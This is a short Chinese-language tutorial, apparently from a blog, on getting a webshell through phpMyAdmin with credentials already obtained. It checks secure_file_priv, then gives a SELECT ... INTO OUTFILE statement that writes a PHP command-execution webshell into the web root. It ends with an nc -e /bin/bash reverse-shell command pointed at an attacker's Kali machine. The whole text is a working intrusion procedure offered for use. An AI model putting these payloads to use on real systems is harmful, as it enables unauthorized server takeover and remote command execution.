利用phpmyadmin拿Webshell

当拿到phpmyadmin的用户名密码后，如何拿到webshell呢，步骤如下：

1. 确认可以通过phpmyadmin写入文件，执行SQL语句：

   show global variables like "secure%";
   

secure_file_priv：
值为NULL表示禁止限制操作
值为某一目录，则只能操作该目录下的文件
没有值则表示不对读写文件进行限制

2. 执行下面的SQL语句，生成webshell文件：

   SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) {system($_GET["cmd"]);} ?> </pre></BODY></HTML>' INTO OUTFILE '/var/www/html/huawen.php'
   

3. 此时在输入框中输入nc -e /bin/bash <kali linux IP 地址> <端口>